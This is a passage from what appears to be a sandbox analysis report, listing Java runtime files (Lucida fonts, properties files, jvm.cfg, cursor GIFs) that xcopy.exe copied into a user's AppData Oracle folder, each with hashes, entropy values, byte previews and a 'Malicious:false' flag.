                                                                                                                                                                                                                                  SSDEEP:192:r+e6a1nsNi8bTeOiO/Ywca9nB2RwhCdvBQGuo6wj:rlnHIR9B2Rwhifj
                                                                                                                                                                                                                                  MD5:77CD430A6D793B50B4501EDC37A1E533
                                                                                                                                                                                                                                  SHA1:D18014CC830FA07C6DBB7D8B6EDBDB4178B9D241
                                                                                                                                                                                                                                  SHA-256:2C5837CA86D000A8621275540D1380880852CF6DE2CFD7496418741B7E88BDF9
                                                                                                                                                                                                                                  SHA-512:705BD76336D20D0C5C30266CBCD8FC91CF0FF1901BDCB682119174173F765BCC50291676664071619AC7AF521A8D1C137F78EFAF065AFBE4A6BF413F9F604401
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# .# Copyright (c) 2003, 2018, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#..# Version..version=1..# Component Font Mappings..allfonts.chinese-ms936=SimSun.allfonts.chinese-ms936-extb=SimSun-ExtB.allfonts.chinese-gb18030=SimSun-18030.allfonts.chinese-gb18030-extb=SimSun-ExtB.allfonts.chinese-hkscs=MingLiU_HKSCS.allfonts.chinese-ms950-extb=MingLiU-ExtB.allfonts.devanagari=Mangal.allfonts.dingbats=Wingdings.allfonts.lucida=Lucida Sans Regular.allfonts.symbol=Symbol.allfonts.symbols=Segoe UI Symbol.allfonts.thai=Lucida Sans Regular.allfonts.georgian=Sylfaen..serif.plain.alphabetic=Times New Roman.serif.plain.chinese-ms950=MingLiU.serif.plain.chinese-ms950-extb=MingLiU-ExtB.serif.plain.hebrew=David.serif.plain.japanese=MS Mincho.serif.plain.korean=Batang..serif.bold.alphabetic=Times New Roman Bold.serif.bold.chinese-ms950=PMingLiU.serif.bold.chinese-ms950-extb=PMingLiU-ExtB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaBrightDemiBold.ttf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,422.Lucida BrightDemiboldLucida Bright Dem
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):75144
                                                                                                                                                                                                                                  Entropy (8bit):6.849420541001734
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:H8Jwt1GIlZ6l0/9tRWhc0x/YxvsTjyIDXCrGU/tlDaKAgKrTLznvzDJIZmjFA0zG:Mwtze9xQcQ/LDaKAgK3LLvzFogbFt5WD
                                                                                                                                                                                                                                  MD5:AF0C5C24EF340AEA5CCAC002177E5C09
                                                                                                                                                                                                                                  SHA1:B5C97F985639E19A3B712193EE48B55DDA581FD1
                                                                                                                                                                                                                                  SHA-256:72CEE3E6DF72AD577AF49C59DCA2D0541060F95A881845950595E5614C486244
                                                                                                                                                                                                                                  SHA-512:6CE87441E223543394B7242AC0CB63505888B503EC071BBF7DB857B5C935B855719B818090305E17C1197DE882CCC90612FB1E0A0E5D2731F264C663EB8DA3F9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...........pLTSH$....#.....OS/2p.{........Vcmap.U.z...T...jcvt 8.E.........fpgm..1.........glyf@>.7...l....hdmx..(:...t..1.head.?....T...6hhea.U........$hmtx..ys...... loca..\4........maxp.8......... name..#.........postM.IA.......prepbM.h.......W.............).......).....d. ............................B&H.. . .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaBrightDemiItalic.ttf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc.Lucida BrightDemibold ItalicLucida Bright Demibold Itali
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):75124
                                                                                                                                                                                                                                  Entropy (8bit):6.805969666701276
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:lww80sTGzcKHwxWL0T+qHi/sbA06PoNORsr5sOnD0OyuusGa7bs4J:lwL0i97WL0T+qHA9cOR05FD0Oyup74w
                                                                                                                                                                                                                                  MD5:793AE1AB32085C8DE36541BB6B30DA7C
                                                                                                                                                                                                                                  SHA1:1FD1F757FEBF3E5F5FBB7FBF7A56587A40D57DE7
                                                                                                                                                                                                                                  SHA-256:895C5262CDB6297C13725515F849ED70609DBD7C49974A382E8BBFE4A3D75F8C
                                                                                                                                                                                                                                  SHA-512:A92ADDD0163F6D81C3AEABD63FF5C293E71A323F4AEDFB404F6F1CDE7F84C2A995A30DFEC84A9CAF8FFAF8E274EDD0D7822E6AABB2B0608696A360CABFC866C6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...........pLTSH.....#.....OS/2k.{........Vcmap.U.z...T...jcvt =jC.........fpgm..1.........glyf.......h...Jhdmx.......`..1.head..X.......6hhea...;.......$hmtx.b......... loca..\....0....maxp...:...D... name .7]...d....postM..A........prep.C.f....................).......).....d. ............................B&H..!. .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaBrightItalic.ttf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,773.Lucida BrightItalicLucida Bright Itali
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):80856
                                                                                                                                                                                                                                  Entropy (8bit):6.821405620058844
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:jw9ESkPFybxWj1V7zbPUoOPjp85rFqXpLboVklDNTc2Wt:jwZO0xWPTU7l85rFYpLbott
                                                                                                                                                                                                                                  MD5:4D666869C97CDB9E1381A393FFE50A3A
                                                                                                                                                                                                                                  SHA1:AA5C037865C563726ECD63D61CA26443589BE425
                                                                                                                                                                                                                                  SHA-256:D68819A70B60FF68CA945EF5AD358C31829E43EC25024A99D17174C626575E06
                                                                                                                                                                                                                                  SHA-512:1D1F61E371E4A667C90C2CE315024AE6168E47FE8A5C02244DBF3DF26E8AC79F2355AC7E36D4A81D82C52149197892DAED1B4C19241575256BB4541F8B126AE2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...........pLTSH...2..:L....OS/2p.|y.......Vcmap.U.z...T...jcvt F.;.........fpgm..1.........glyf.}.....@....hdmx?..p......1.head.A![.......6hhea.......P...$hmtx3..9...t... loca6..........maxp.......... name...p.......~postM..A...H....prep.......................).......).6...d. ............................B&H.... .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaBrightRegular.ttf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,421.Lucida BrightRegularLucida Bright Regu
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):344908
                                                                                                                                                                                                                                  Entropy (8bit):6.939775499317555
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:oBfQeUG2CCTufrmOufymM8hvFHp277tS9iZFYSATxNm:oNQ3vCCTcaFNJw7tSgYS82
                                                                                                                                                                                                                                  MD5:630A6FA16C414F3DE6110E46717AAD53
                                                                                                                                                                                                                                  SHA1:5D7ED564791C900A8786936930BA99385653139C
                                                                                                                                                                                                                                  SHA-256:0FAAACA3C730857D3E50FBA1BBAD4CA2330ADD217B35E22B7E67F02809FAC923
                                                                                                                                                                                                                                  SHA-512:0B7CDE0FACE982B5867AEBFB92918404ADAC7FB351A9D47DCD9FE86C441CACA4DD4EC22E36B61025092220C0A8730D292DA31E9CAFD7808C56CDBF34ECD05035
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...........pLTSHN..U..=....~OS/2...S.......Vcmap..tO...T....cvt =|t>.......tfpgm..1....`....glyf.J.........Jhdmx]......D....head.WD...h...6hhea.j.........$hmtxW.6|........loca............maxp......4.... nameJO....4....rpost..g...8,..M.prep.].O.......T.............).......).....d. .............."....`........B&H..@. ...D.]...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................|...........~.............&.u.z.~.......................O.\.....................:.R.m.......... . . . . " & 0 : D t .!"!&!.".%....................3.b.r.t....... .............&.t.z.~.........................Q.^...................!.@.`.p........ . . . . & 0 9 D t .!"!&!.".%....................3.^.p.t.v.........W.......M......................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaSansDemiBold.ttf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 15 tables, 1st "LTSH", 19 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansDemiboldLucida Sa
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):317896
                                                                                                                                                                                                                                  Entropy (8bit):6.869598480468745
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:R5OO1ZjNDE7/MsTJ30otegK4zJwz3UhG5jXsrg2HLzYv7cf0R7o7+WX/ov2DG:bOO11CEo9xzJwljXsrhHQ7cMuX/16
                                                                                                                                                                                                                                  MD5:5DD099908B722236AA0C0047C56E5AF2
                                                                                                                                                                                                                                  SHA1:92B79FEFC35E96190250C602A8FED85276B32A95
                                                                                                                                                                                                                                  SHA-256:53773357D739F89BC10087AB2A829BA057649784A9ACBFFEE18A488B2DCCB9EE
                                                                                                                                                                                                                                  SHA-512:440534EB2076004BEA66CF9AC2CE2B37C10FBF5CC5E0DD8B8A8EDEA25E3613CE8A59FFCB2500F60528BBF871FF37F1D0A3C60396BC740CCDB4324177C38BE97A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...........pLTSH_R.a........OS/2...........Vcmapz.$L.......Zcvt ...y...8...hfpgm..1.........glyf......\....hdmx..0A.......hhead..&..:H...6hhea......:....$hmtx.,Z:..:.....loca.~'...T.....maxp......n.... name..=%..n....Kpost$.#...s$..[?prep......d...a..........................................)........2'............'........ ....................".".............0.%...............%...........)....................... ......0 ..............................) ) ) ) ...........................................2.2.2.2.).......................................................'"'"'"1....0.........................................................................................................'.....'...........)..,...&,....#............./&.....&.&.$.....$...$........'....... ....)...."...,.......+.....'....).,.....-)..)................... ..."..................,.........(.........,........................../..2.......+.........,.#) .....................+..).........0......+...............,.,.,......

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaSansRegular.ttf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 18 tables, 1st "GDEF", 19 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansRegularLucida Sans Regu
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):698236
                                                                                                                                                                                                                                  Entropy (8bit):6.892888039120645
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:6obn11t7t7DxT+3+OQ64cctiOAq12ZX/DmfT6R83Sd8uvx7wSnyER4ky+SH/KPKQ:6oTJZzHniOAZ783Sd8uvx7wSnyER4kyI
                                                                                                                                                                                                                                  MD5:B75309B925371B38997DF1B25C1EA508
                                                                                                                                                                                                                                  SHA1:39CC8BCB8D4A71D4657FC92EF0B9F4E3E9E67ADD
                                                                                                                                                                                                                                  SHA-256:F8D877B0B64600E736DFE436753E8E11ACB022E59B5D7723D7D221D81DC2FCDE
                                                                                                                                                                                                                                  SHA-512:9C792EF3116833C90103F27CFD26A175AB1EB11286959F77062893A2E15DE44D79B27E5C47694CBBA734CC05A9A5BEFA72E991C7D60EAB1495AAC14C5CAD901D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:........... GDEF..|.......GPOS.......L...HGSUB.f.........LTSH...........uOS/2.#GQ...,...Vcmap..4........4cvt .y..........fpgm.!&.........glyf. ..........hdmx...M...(...\head..........6hhea...........$hmtx.S........-.loca'.c......-.maxp...Y....... nameW..r........post.&-.........prep.........................).......).....d. ...................{........B&H..@. ...D.]......`................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~..........................................................................................................".....".~...............E.u.z.~.......................O.\...............................:.R.m.............9.M.T.p.:.[.... . F p . . .!8!.!.".#.#.#!$i%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&.&.&.&.&<&@&B&`&c&f&k'.'.'''K'M'R'V'^'g'.'.'................ .3.....6.<.>.A.D.N.b.r.t......... .........P.......t.z.~

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaTypewriterBold.ttf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc.Lucida Sans TypewriterBoldLucida Sans Typewrite
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):234068
                                                                                                                                                                                                                                  Entropy (8bit):6.901545053424004
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:3BPS7w5KIMtYwqcO3GbA4MJcs2ME9UGQ2n9gM/oD:xVMtgcGGPMJcs4b9gM/4
                                                                                                                                                                                                                                  MD5:A0C96AA334F1AEAA799773DB3E6CBA9C
                                                                                                                                                                                                                                  SHA1:A5DA2EB49448F461470387C939F0E69119310E0B
                                                                                                                                                                                                                                  SHA-256:FC908259013B90F1CBC597A510C6DD7855BF9E7830ABE3FC3612AB4092EDCDE2
                                                                                                                                                                                                                                  SHA-512:A43CF773A42B4CEBF4170A6C94060EA2602D2D7FA7F6500F69758A20DC5CC3ED1793C7CEB9B44CE8640721CA919D2EF7F9568C5AF58BA6E3CF88EAE19A95E796
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...........POS/2..........VcmapW......4....cvt .M/.........fpgm..1.........glyf|......@....head.c....L...6hhea...........$hmtx.e.........tloca..h..."....xmaxp......7.... name......7.....post1..%..;h..I.prep.......4... .............3.......3...1.f................+...x.........B&H.. . ...D.]......`................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a....................................................................................................................................x...........~...............u.z.~.......................O.\...............................:.R.m...........:.[.... . . . " & 0 3 : < > D . . . . .!.!.!.!"!&!.!^!.!.".".".".".".".")"+"H"a"e#.#.#!%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&<&@&B&`&c&f&k...................3...b.r.t....... ...............t.z.~.........................Q.^.............................!.@.`.p...........?.... . . . &

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaTypewriterRegular.ttf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc.Lucida Sans TypewriterRegularLucida Sans Typewriter R
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):242700
                                                                                                                                                                                                                                  Entropy (8bit):6.936925430880877
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:VwzZsJcCrn271g+UGFDUnrrHqMyBtlc3+fzx5R1zeqZdDgfSkecUfEDpEXzSyPMx:GWcCrn2C46Ak+naqaucYEDpEX3gZoO9
                                                                                                                                                                                                                                  MD5:C1397E8D6E6ABCD727C71FCA2132E218
                                                                                                                                                                                                                                  SHA1:C144DCAFE4FAF2E79CFD74D8134A631F30234DB1
                                                                                                                                                                                                                                  SHA-256:D9D0AAB0354C3856DF81AFAC49BDC586E930A77428CB499007DDE99ED31152FF
                                                                                                                                                                                                                                  SHA-512:DA70826793C7023E61F272D37E2CC2983449F26926746605C550E9D614ACBF618F73D03D0C6351B9537703B05007CD822E42E6DC74423CB5CC736B31458D33B1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...........POS/2...s.......`cmap..Rh...<....cvt m......@...<fpgm..1....|....glyf..;}...8....head.,j..2L...6hhea......2....$hmtx.....2.....loca.PB...H(....maxp.z....].... namex.R...].....post...Q..ax..I.prep.UJ....\.................).......).....d. ..............{.............B&H..@. ...D.\...... ........=..... ......................................................................................... !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~..................................................................................................................~...............u.z.~.......................O.\...............................:.R.m...........:.[.... . . . " & 0 3 : < > D . . . .!.!.!.!"!&!.!^!.!.".".".".".".".")"+"H"a"e#.#.#!%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&<&@&B&`&c&f&k.........................3...b.r.t....... ...............t.z.~.........................Q.^.............................!.@.`.p...........?..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\hijrah-config-umalqura.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13962
                                                                                                                                                                                                                                  Entropy (8bit):3.4283479014478493
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:RgZass+YXdGOS8NhN9Yd9Yq67IwOYUuUS9O0:RyJO/BFi9YqAInYUuUmO0
                                                                                                                                                                                                                                  MD5:1EDDFB1EE252055556F40CDC79632E98
                                                                                                                                                                                                                                  SHA1:84AA425100740722E91F4725CAF849E7863D12BA
                                                                                                                                                                                                                                  SHA-256:69BECFE0D45B62BBDBCF6FE111A8A3A041FB749B6CF38E8A2F670607E17C9EE2
                                                                                                                                                                                                                                  SHA-512:A0FDBF42FF105C9A2F12179124606A720DF8F32365605644E15600767E5732312777A58390FDB1A9B1C0B152CCC29496133B278A6E5736B38AF2B5FAB251D40C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright (c) 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.# This properties file defines a Hijrah calendar variant..#.# Fields:.#.# <version> ::= 'version' '=' <version string>.# <id> ::= 'id' '=' <id string>.# <type> ::= 'type' '=' <type string>.# <iso-start> ::= 'iso-start' '=' <start date in the ISO calendar>.# <year> ::= <yyyy> '=' <nn nn nn nn nn nn nn nn nn nn nn nn>.#.# version ... (Required).#.# id ... (Required).# Identifies the Java Chronology.#.# type ... (Required).# Identifies the type of calendar in the standard calendar ID scheme.# iso-start ... (Required).# Specifies the corresponding ISO date to the first Hijrah day.# in the defined range of dates.#.# year ... (Required).# Number of days for each month of a Hijrah year.# * Each line defines a year. The years must be in chronological.#

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\i386\jvm.cfg

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):623
                                                                                                                                                                                                                                  Entropy (8bit):4.956046853743128
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:QcwmIzDhHlB725iwoXH3ExOvadDfI3xizh49g1n8OEDfI7yO7:QhDBfOoXHjifIBMB1XqfI77
                                                                                                                                                                                                                                  MD5:9AEF14A90600CD453C4E472BA83C441F
                                                                                                                                                                                                                                  SHA1:10C53C9FE9970D41A84CB45C883EA6C386482199
                                                                                                                                                                                                                                  SHA-256:9E86B24FF2B19D814BBAEDD92DF9F0E1AE86BF11A86A92989C9F91F959B736E1
                                                                                                                                                                                                                                  SHA-512:481562547BF9E37D270D9A2881AC9C86FC8F928B5C176E9BAF6B8F7B72FB9827C84EF0C84B60894656A6E82DD141779B8D283C6E7A0E85D2829EA071C6DB7D14
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright (c) 2001, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.# List of JVMs that can be used as an option to java, javac, etc..# Order is important -- first in this list is the default JVM..# NOTE that this both this file and its format are UNSUPPORTED and.# WILL GO AWAY in a future release..#.# You may also select a JVM in an arbitrary location with the.# "-XXaltjvm=<jvm_dir>" option, but that too is unsupported.# and may not be available in a future release..#.-client KNOWN.-server KNOWN.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\cursors.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1280
                                                                                                                                                                                                                                  Entropy (8bit):4.9763389414972465
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:RlwQtG0Bf29d3ptAMZGpfFGZWpHN07mBpQKf4TpxV4jp504Tz8pFMafpXs:RlwQM0BfEpZSKyCycXW44Cfy
                                                                                                                                                                                                                                  MD5:269D03935907969C3F11D43FEF252EF1
                                                                                                                                                                                                                                  SHA1:713ACB9EFF5F0B14A109E6C2771F62EAC9B57D7C
                                                                                                                                                                                                                                  SHA-256:7B8B63F78E2F732BD58BF8F16144C4802C513A52970C18DC0BDB789DD04078E4
                                                                                                                                                                                                                                  SHA-512:94D8EE79847CD07681645D379FEEF6A4005F1836AC00453FB685422D58113F641E60053F611802B0FF8F595B2186B824675A91BF3E68D336EF5BD72FAFB2DCC5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.#.# Cursors Properties file.#.# Names GIF89 sources for Custom Cursors and their associated HotSpots.#.# Note: the syntax of the property name is significant and is parsed.# by java.awt.Cursor.#.# The syntax is: Cursor.<name>.<geom>.File=win32_<filename>.# Cursor.<name>.<geom>.HotSpot=<x>,<y>.#. Cursor.<name>.<geom>.Name=<localized name>.#.Cursor.CopyDrop.32x32.File=win32_CopyDrop32x32.gif.Cursor.CopyDrop.32x32.HotSpot=0,0.Cursor.CopyDrop.32x32.Name=CopyDrop32x32.#.Cursor.MoveDrop.32x32.File=win32_MoveDrop32x32.gif.Cursor.MoveDrop.32x32.HotSpot=0,0.Cursor.MoveDrop.32x32.Name=MoveDrop32x32.#.Cursor.LinkDrop.32x32.File=win32_LinkDrop32x32.gif.Cursor.LinkDrop.32x32.HotSpot=0,0.Cursor.LinkDrop.32x32.Name=LinkDrop32x32.#.Cursor.CopyNoDrop.32x32.File=win32_CopyNoDrop32x32.gif.Cursor.CopyNoDrop.32x32.HotSpot=6,2.Cursor.CopyNoDrop.32x32.Name=CopyNoDrop32x32.#.Cursor.MoveNoDrop.32x32.File=win32_MoveNoDrop32x32.gif.Cursor.MoveNoDrop.32x32.HotSpot=6,2.Cursor.MoveNoDrop.32

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\invalid32x32.gif

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):153
                                                                                                                                                                                                                                  Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                  MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                  SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                  SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                  SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_CopyDrop32x32.gif

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 31 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):165
                                                                                                                                                                                                                                  Entropy (8bit):6.347455736310776
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:CruuU/XExlHrBwM7Qt/wCvTjh2Azr8ptBNKtWwUzJ7Ful5u44JyYChWn:KP0URwMcx3UAzADBNwUlBul5TLYMWn
                                                                                                                                                                                                                                  MD5:89CDF623E11AAF0407328FD3ADA32C07
                                                                                                                                                                                                                                  SHA1:AE813939F9A52E7B59927F531CE8757636FF8082
                                                                                                                                                                                                                                  SHA-256:13C783ACD580DF27207DABCCB10B3F0C14674560A23943AC7233DF7F72D4E49D
                                                                                                                                                                                                                                  SHA-512:2A35311D7DB5466697D7284DE75BABEE9BD0F0E2B20543332FCB6813F06DEBF2457A9C0CF569449C37F371BFEB0D81FB0D219E82B9A77ACC6BAFA07499EAC2F7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GIF89a.. ................!.......,...... ...vL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj........k.-mF.. V..9'......f.T....w.xW.B.....P..;

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_CopyNoDrop32x32.gif

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):153
